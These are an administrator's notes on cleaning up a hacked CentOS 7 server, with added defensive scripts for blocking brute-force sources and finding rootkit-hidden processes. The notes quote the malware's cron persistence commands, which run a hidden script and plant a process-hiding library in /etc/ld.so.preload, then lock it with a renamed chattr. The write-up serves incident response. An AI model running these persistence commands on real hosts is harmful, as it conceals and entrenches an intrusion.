Notes from cleaning up a hacked Linux CentOS 7 box - 20201015

What the compromise looked like: top showed CPU usage at 100%, and the web application on the CentOS 7 host had become slow to respond.

Below are the scattered notes I kept as I went along:
lastb showed a massive number of suspicious ssh logins. I picked a typical source and blocked it like this:
firewall-cmd --permanent --zone=public --add-rich-rule='rule family="ipv4" source address="45.141.84.10" port protocol="tcp" port="40022" reject'
firewall-cmd --reload
firewall-cmd --list-all-zones
(Single quotes around the rich rule keep its inner double quotes intact. Note that this rule only rejects that source on tcp/40022; drop the port clause to reject the source on every port.)
The ssh logins kept coming after that, so I simply shut sshd down; fail2ban is worth adding later.
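A mechanical version of the lastb step, added here as an example (it is not code from the original post): it counts failed logins per source in lastb output and prints the firewalld commands that block every source at or above a threshold. The lastb lines are constructed; only 45.141.84.10 is from the post, the other addresses are documentation ranges. The rules are printed rather than applied, so they can be reviewed and then run as root. Two caveats: lastb reads /var/log/btmp, which an attacker with root can truncate, and a per-source block is only a stopgap next to key-only authentication or fail2ban.

```shell
#!/bin/sh
# Added example: a minimal fail2ban-style pass over `lastb` output.
# Counts failed logins per source and prints firewalld rich rules for every
# source at or above a threshold. Sample data is constructed; rules are printed,
# not applied (review them first, then run them as root).
set -u

# Read `lastb` output on stdin. For ssh:notty entries the source host is field 3;
# lines whose third field is not a dotted quad (console logins) are skipped.
# Prints "count ip" for sources with >= threshold failures, highest first.
lastb_offenders() {
    awk -v min="$1" '
        $3 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { n[$3]++ }
        END { for (ip in n) if (n[ip] >= min) printf "%d %s\n", n[ip], ip }
    ' | sort -rn
}

# One rich rule per source. Unlike the port-specific rule in the post, a rule
# with no port clause rejects the source on every port.
block_rule() {
    printf "firewall-cmd --permanent --zone=public --add-rich-rule='rule family=\"ipv4\" source address=\"%s\" reject'\n" "$1"
}

# Constructed `lastb` output; only 45.141.84.10 comes from the post.
SAMPLE_LASTB='root     ssh:notty    45.141.84.10     Thu Oct 15 10:01 - 10:01  (00:00)
admin    ssh:notty    45.141.84.10     Thu Oct 15 10:01 - 10:01  (00:00)
root     ssh:notty    45.141.84.10     Thu Oct 15 10:02 - 10:02  (00:00)
root     ssh:notty    203.0.113.9      Thu Oct 15 10:02 - 10:02  (00:00)
test     ssh:notty    45.141.84.10     Thu Oct 15 10:03 - 10:03  (00:00)
root     ssh:notty    203.0.113.9      Thu Oct 15 10:03 - 10:03  (00:00)
root     ssh:notty    203.0.113.9      Thu Oct 15 10:04 - 10:04  (00:00)
oracle   ssh:notty    198.51.100.4     Thu Oct 15 10:05 - 10:05  (00:00)
root     tty1                          Thu Oct 15 09:00 - 09:00  (00:00)'

# Block everything with three or more failures, then reload once.
printf '%s\n' "$SAMPLE_LASTB" | lastb_offenders 3 | while read -r count ip; do
    echo "# $count failed logins from $ip"
    block_rule "$ip"
done
echo 'firewall-cmd --reload'
```

On a live host replace the sample with `lastb | lastb_offenders 3`; the threshold is deliberately low because a real brute-force source produces hundreds of entries, and a single typo from a colleague produces one.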

Disable the GUI to cut resource usage:
systemctl get-default
systemctl set-default multi-user.target

An unrelated grub tweak from the same session, ignore it:
/etc/default/grub   (this is where the GRUB_* settings live on CentOS 7; /etc/default/grub.cfg is not the settings file)
GRUB_HIDDEN_TIMEOUT=0
GRUB_HIDDEN_TIMEOUT_QUIET=true
grub2-mkconfig -o /boot/grub2/grub.cfg   (update-grub is the Debian/Ubuntu wrapper and is not shipped on CentOS 7)

Suspicious login session, kick it off the box (w or who shows which pts each session is on):
pkill -kill -t pts/0

Here is how to find the full path of a suspicious process:
ps and top show a process as it was invoked, usually a relative name, and not details such as the absolute path of its executable. Those come from /proc:
When Linux starts a process, it creates a directory under /proc named after the PID. That directory holds the process's details, including a symlink named exe that points at the absolute path of the executable; ls -l shows where each link points.
ls -l /proc/PID
Meaning of the entries:
cwd is a symlink to the process's working directory;
exe is a symlink to the absolute path of the executable (it ends in "(deleted)" if the binary was removed after the process started, a common trick);
cmdline is the command line the process was started with (NUL-separated, so print it with tr '\0' ' ' < /proc/PID/cmdline);
environ holds the environment variables the process was started with;
fd holds symlinks to every file the process has open

Check SELinux status:
getenforce
sestatus
/etc/selinux/config

On CentOS 7, poweroff printed:
PolicyKit daemon disconnected from the bus.
We are no longer a registered authentication agent.
I searched online for a long time without finding an answer; a foreign poster said it is a system bug.

netstat, to look at network connections, printed nothing (only later did I discover that netstat itself had been replaced by the malware):
netstat -tplun

To let the legitimate services recover as far as possible while the malware was hogging the CPU, raising the priority of the legitimate service processes is a reasonable stopgap:
First find mysql's pid
pidof mysqld

top -p PID watches that one pid

Linux nice values run from -20 to 19; the larger the number, the lower the priority.
top shows it in the NI column.
There are two ways to change a process's priority (root is needed to raise priority, i.e. to lower the nice value):
1. top
Press r, enter the process ID at the prompt, then the new nice value.
2. renice
renice -n 2 -p 1234 (-n: the nice value; -p: the process ID). A nice value of 2 actually lowers the priority slightly; to favor mysqld over the malware, use a negative value, e.g. renice -n -5 -p 1234.

With the legitimate processes reprioritized, the next job was deleting the suspicious files, and that is where the most annoying part began: they could not be deleted. My guess was that extended attributes had been set on them, but when I went to check with lsattr the command was not found; presumably it had been renamed (it turned out chattr had been renamed to lockr, see the cron entries below). Not knowing what else had been renamed, I reinstalled the package that provides the tools:
lsattr not available on CentOS 7
yum -y install e2fsprogs
(If yum says the package is already installed, yum -y reinstall e2fsprogs puts the genuine binaries back; rpm -V e2fsprogs lists which of its files no longer match the package.)

a5059bc002 kept running. Remove the binary and leave an immutable empty file in its place so it cannot be written back:
[root@centos7 lib]# rm -f /usr/bin/a5059bc002
[root@centos7 lib]# touch /usr/bin/a5059bc002
[root@centos7 lib]# chattr +i /usr/bin/a5059bc002
[root@centos7 lib]# ls -l /usr/bin/a5059bc002
-rw-r--r-- 1 root root 0 Oct 16 18:02 /usr/bin/a5059bc002
[root@centos7 lib]# lsattr /usr/bin/a5059bc002
----i----------- /usr/bin/a5059bc002

Check cron for suspicious programs being run periodically.
tail -f -n 300 /var/log/cron showed the following:

Oct 16 15:36:01 centos7 CROND[2204]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2>/dev/null && /tmp/.sh -c >/dev/null 2>&1 && rm -rf -- /tmp/.sh 2>/dev/null)
Oct 16 15:36:01 centos7 CROND[2206]: (root) CMD ( echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1)
Oct 16 15:36:01 centos7 CROND[2205]: (root) CMD (/etc/sphp >/dev/null 2>&1)

So chattr has been renamed lockr. The second job re-plants the process-hiding library in /etc/ld.so.preload every minute and makes that file immutable; a library loaded that way is injected into every dynamically linked program on the box, and this one hooks directory listing so that the processes it is built to hide never show up in ps or top.
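An added example (not from the original post) that ties the /proc notes from earlier to the ld.so.preload entry just found. libprocesshider.so hooks readdir(), so every dynamically linked tool that lists /proc, which includes ps, top, ls and a shell glob, skips the PIDs it hides; stat() is not hooked, so probing /proc/N directly still finds them. The script compares the two views and prints exe, cwd and cmdline for every PID that only the probe sees. Without arguments it runs on a constructed pair of PID lists and on its own shell; with --live it scans the host. It assumes Linux with /proc mounted, and root to read other users' exe links.

```shell
#!/bin/sh
# Added example, not code from the original post. Find processes that a
# readdir()-hooking LD_PRELOAD rootkit hides, then show their /proc details.
# Assumptions: Linux, /proc mounted, root for other users' exe links.
set -u

# Identify a process from /proc: readlink on exe gives the absolute path of the
# binary and appends "(deleted)" if it was unlinked after start; cmdline is
# NUL-separated, so the NULs are turned into spaces for printing.
proc_info() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "pid $pid: no such process"; return 1; }
    echo "pid=$pid"
    echo "exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
    echo "cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
    echo "cmdline=$(tr '\000' ' ' < "/proc/$pid/cmdline" 2>/dev/null)"
    return 0
}

# PIDs found by stat()ing /proc/N for every N up to pid_max, bypassing readdir().
# CentOS 7's default kernel.pid_max is 32768; pass $(cat /proc/sys/kernel/pid_max)
# on hosts that raised it.
probe_pids() {
    max=${1:-32768}
    i=1
    while [ "$i" -le "$max" ]; do
        if [ -e "/proc/$i/status" ]; then echo "$i"; fi
        i=$((i + 1))
    done
    return 0
}

# PIDs as a readdir()-based listing reports them: the view a rootkit can edit.
visible_pids() {
    for d in /proc/[0-9]*; do echo "${d#/proc/}"; done
    return 0
}

# Print the entries of list $1 that are missing from list $2 (newline-separated).
hidden_pids() {
    { printf '%s\n' "$2"; echo '--'; printf '%s\n' "$1"; } |
    awk '$0 == "--"    { second = 1; next }
         !NF           { next }
         !second       { seen[$0] = 1; next }
         !($0 in seen) { print }'
    return 0
}

if [ "${1:-}" = "--live" ]; then
    all=$(probe_pids "$(cat /proc/sys/kernel/pid_max)")
    shown=$(visible_pids)
    # A PID that exits between the two scans shows up once; a rootkit-hidden one
    # shows up on every run, so repeat the scan before acting on a hit.
    for p in $(hidden_pids "$all" "$shown"); do proc_info "$p"; done
else
    # Constructed lists: 1337 exists but is missing from the visible list.
    hidden_pids "$(printf '1\n2\n1337')" "$(printf '1\n2')"
    proc_info "$$"
fi
```

The same comparison can be made against `ps -e -o pid=` instead of the glob, but on this host ps had been gutted, which is why the glob is used as the "what the rootkit lets you see" side.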

The pattern is clear: every planted file carries the same timestamp, Oct 14 11:37, so find can pull them all out by modification time.

top shows the pid with the high CPU usage; less /proc/PID/cmdline then shows where it was launched from (the file is NUL-separated, so tr '\0' ' ' < /proc/PID/cmdline reads better). Keep in mind that anything libprocesshider.so is hiding will not appear in top at all.
find / -type f -newermt '2020-10-14 11:00' ! -newermt '2020-10-14 12:00'

find / -type f -perm -111 -newermt '2020-10-14 11:00' ! -newermt '2020-10-14 12:00'   (executables only; -perm -111 requires all three execute bits, -perm /111 matches any of them)

ls -lSh /usr/bin lists a directory by size, largest first

What the search turned up (ls -l output; the host's locale prints the month as 10月, i.e. October):

-rwxr-xr-x 1 root root 30 10月 14 11:37 /bindu/phps
-rwxrwxrwx 1 root root 43 10月 14 11:37 /bindu/phpx
-rw-r--r-- 1 root root 370 10月 14 11:37 /etc/allow.bak
-rw-r--r--. 1 root root 782 10月 14 11:37 /etc/crontab
-rw-r--r-- 1 root root 460 10月 14 11:37 /etc/deny.bak
-rw-r--r--. 1 root root 568 10月 14 11:37 /etc/fstab
-rw-r--r-- 1 root root 541 10月 14 11:37 /etc/fstab.bak
-rw-r--r-- 1 root root 949 10月 14 11:37 /etc/group
---------- 1 root root 764 10月 14 11:37 /etc/gshadow
-rw-r--r-- 1 root root 2.3K 10月 14 11:37 /etc/passwd
-rw-r--r--. 1 root root 1.8K 10月 14 11:37 /etc/profile
-rwxrwxrwx 1 root root 188 10月 14 11:37 /etc/profile.d/php.sh
-rwxr-xr-x 1 root root 114 10月 14 11:38 /etc/profile.d/supervisor.sh
-rwxrwxrwx 1 root root 665K 10月 14 11:37 /etc/sphp
-rwxr-xr-x 1 root root 954K 10月 14 11:37 /etc/spts
-rwxr-xr-x 1 root root 300 10月 14 11:38 /etc/.supervisor/conf.d/123.conf
-rw-r--r-- 1 root root 9.0K 10月 14 11:38 /etc/.supervisor/supervisord.conf
-rw-r--r--. 1 root root 515 10月 14 11:37 /etc/sysctl.conf
-rw------- 1 root root 381 10月 14 11:37 /root/.ssh/authorized_keys
-rwxr-xr-x 1 root root 2.0G 10月 14 11:37 /swapfile
-rwxr-xr-x 1 root root 409K 10月 14 11:37 /usr/bin/.bget
-rwxrwxrwx 1 root root 409K 10月 14 11:37 /usr/bin/dget
-rwxr-xr-x 1 root root 151K 10月 14 11:37 /usr/bin/dpkgd/lsof
-rwxrwxrwx 1 root root 152K 10月 14 11:37 /usr/bin/dpkgd/netstat
-rwxrwxrwx 1 root root 98K 10月 14 11:37 /usr/bin/dpkgd/ps
-rwxrwxrwx 1 root root 113K 10月 14 11:37 /usr/bin/dpkgd/ss
-rwxr-xr-x 1 root root 338 10月 14 11:37 /usr/bin/echo_supervisord_conf
-rwxr-xr-x 1 root root 954K 10月 14 11:37 /usr/bin/.funzip
-rwxrwxrwx 1 root root 98K 10月 14 11:37 /usr/bin/ips
-rwxrwxrwx 1 root root 113K 10月 14 11:37 /usr/bin/iss
-rwxrwxrwx 1 root root 12K 10月 14 11:37 /usr/bin/lockr
-rwxrwxrwx 1 root root 12K 10月 14 11:38 /usr/bin/lockrc
-rwxrwxrwx 1 root root 12K 10月 14 11:37 /usr/bin/.locks
-rwxrwxrwx 1 root root 12K 10月 14 11:38 /usr/bin/.locksc
-rwxrwxrwx 1 root root 1.2M 10月 14 11:37 /usr/bin/longbak
-rwxrwxrwx 1 root root 152K 10月 14 11:37 /usr/bin/nets
-rwxrwxrwx. 1 root root 71 10月 14 11:37 /usr/bin/netstat
-rwxr-xr-x 1 root root 312 10月 14 11:37 /usr/bin/pidproxy
-rwxr-xr-x 1 root root 322 10月 14 11:37 /usr/bin/supervisorctl
-rwxr-xr-x 1 root root 318 10月 14 11:37 /usr/bin/supervisord
-rwxr-xr-x 1 root root 85 10月 14 11:37 /usr/lib/mysql/mysql
-rw-r--r-- 1 root root 238 10月 14 11:37 /usr/lib/python2.7/site-packages/easy-install.pth
-rw-r--r-- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/dependency_links.txt
-rw-r--r-- 1 root root 1.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/PKG-INFO
-rw-r--r-- 1 root root 291 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/SOURCES.txt
-rw-r--r-- 1 root root 6 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/top_level.txt
-rw-r--r-- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/EGG-INFO/zip-safe
-rw-r--r-- 1 root root 3.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/_compat.py
-rw-r--r-- 1 root root 4.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/_compat.pyc
-rw-r--r-- 1 root root 44K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/init.py
-rw-r--r-- 1 root root 45K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/init.pyc
-rw-r--r-- 1 root root 134 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/meld3.py
-rw-r--r-- 1 root root 346 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/meld3.pyc
-rw-r--r-- 1 root root 62K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/test_meld3.py
-rw-r--r-- 1 root root 66K 10月 14 11:37 /usr/lib/python2.7/site-packages/meld3-2.0.1-py2.7.egg/meld3/test_meld3.pyc
-rwxrw-rw- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/dependency_links.txt
-rwxrw-rw- 1 root root 192 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/entry_points.txt
-rwxrw-rw- 1 root root 11 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/namespace_packages.txt
-rwxrw-rw- 1 root root 1 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/not-zip-safe
-rwxrw-rw- 1 root root 86K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/PKG-INFO
-rwxrw-rw- 1 root root 49 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/requires.txt
-rwxrw-rw- 1 root root 3.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/SOURCES.txt
-rwxrw-rw- 1 root root 11 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/EGG-INFO/top_level.txt
-rw-r--r-- 1 root root 2.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/childutils.py
-rw-r--r-- 1 root root 4.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/childutils.pyc
-rw-r--r-- 1 root root 154 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/confecho.py
-rw-r--r-- 1 root root 539 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/confecho.pyc
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/datatypes.py
-rw-r--r-- 1 root root 19K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/datatypes.pyc
-rw-r--r-- 1 root root 18K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/dispatchers.py
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/dispatchers.pyc
-rw-r--r-- 1 root root 6.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/events.py
-rw-r--r-- 1 root root 15K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/events.pyc
-rw-r--r-- 1 root root 6.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http_client.py
-rw-r--r-- 1 root root 9.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http_client.pyc
-rw-r--r-- 1 root root 31K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http.py
-rw-r--r-- 1 root root 28K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/http.pyc
-rw-r--r-- 1 root root 56 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/init.py
-rw-r--r-- 1 root root 256 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/init.pyc
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/loggers.py
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/loggers.pyc
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asynchat_25.py
-rw-r--r-- 1 root root 9.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asynchat_25.pyc
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asyncore_25.py
-rw-r--r-- 1 root root 20K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/asyncore_25.pyc
-rw-r--r-- 1 root root 4.8K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/auth_handler.py
-rw-r--r-- 1 root root 4.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/auth_handler.pyc
-rw-r--r-- 1 root root 1.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/counter.py
-rw-r--r-- 1 root root 2.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/counter.pyc
-rw-r--r-- 1 root root 6.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/default_handler.py
-rw-r--r-- 1 root root 5.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/default_handler.pyc
-rw-r--r-- 1 root root 12K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/filesys.py
-rw-r--r-- 1 root root 15K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/filesys.pyc
-rw-r--r-- 1 root root 3.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_date.py
-rw-r--r-- 1 root root 3.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_date.pyc
-rw-r--r-- 1 root root 29K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_server.py
-rw-r--r-- 1 root root 26K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/http_server.pyc
-rw-r--r-- 1 root root 121 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/init.py
-rw-r--r-- 1 root root 297 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/init.pyc
-rw-r--r-- 1 root root 7.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/logger.py
-rw-r--r-- 1 root root 12K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/logger.pyc
-rw-r--r-- 1 root root 2.8K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/medusa_gif.py
-rw-r--r-- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/medusa_gif.pyc
-rw-r--r-- 1 root root 7.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/m_syslog.py
-rw-r--r-- 1 root root 4.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/m_syslog.pyc
-rw-r--r-- 1 root root 8.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/producers.py
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/producers.pyc
-rw-r--r-- 1 root root 9.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/status_handler.py
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/status_handler.pyc
-rw-r--r-- 1 root root 2.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/xmlrpc_handler.py
-rw-r--r-- 1 root root 4.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/medusa/xmlrpc_handler.pyc
-rw-r--r-- 1 root root 80K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/options.py
-rw-r--r-- 1 root root 71K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/options.pyc
-rw-r--r-- 1 root root 1.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/pidproxy.py
-rw-r--r-- 1 root root 3.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/pidproxy.pyc
-rw-r--r-- 1 root root 6.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/poller.py
-rw-r--r-- 1 root root 12K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/poller.pyc
-rw-r--r-- 1 root root 34K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/process.py
-rw-r--r-- 1 root root 29K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/process.pyc
-rw-r--r-- 1 root root 35K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/rpcinterface.py
-rw-r--r-- 1 root root 32K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/rpcinterface.pyc
-rwxrw-rw- 1 root root 779 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_eventgen.py
-rw-r--r-- 1 root root 1.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_eventgen.pyc
-rwxrw-rw- 1 root root 716 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_listener.py
-rw-r--r-- 1 root root 957 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/loop_listener.pyc
-rwxrw-rw- 1 root root 562 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_commevent.py
-rw-r--r-- 1 root root 985 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_commevent.pyc
-rwxrw-rw- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_eventlistener.py
-rw-r--r-- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_eventlistener.pyc
-rwxrw-rw- 1 root root 1.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_exiting_eventlistener.py
-rw-r--r-- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/scripts/sample_exiting_eventlistener.pyc
-rwxrw-rw- 1 root root 9.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/skel/sample.conf
-rw-r--r-- 1 root root 3.0K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/socket_manager.py
-rw-r--r-- 1 root root 5.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/socket_manager.pyc
-rw-r--r-- 1 root root 1.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/states.py
-rw-r--r-- 1 root root 2.5K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/states.pyc
-rw-r--r-- 1 root root 48K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisorctl.py
-rw-r--r-- 1 root root 46K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisorctl.pyc
-rw-r--r-- 1 root root 15K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisord.py
-rw-r--r-- 1 root root 14K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/supervisord.pyc
-rw-r--r-- 1 root root 34K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/base.py
-rw-r--r-- 1 root root 58K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/base.pyc
-rwxrw-rw- 1 root root 425 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/donothing.conf
-rwxrw-rw- 1 root root 125 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/spew.py
-rw-r--r-- 1 root root 321 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/spew.pyc
-rwxrw-rw- 1 root root 185 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/unkillable_spew.py
-rw-r--r-- 1 root root 405 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/fixtures/unkillable_spew.pyc
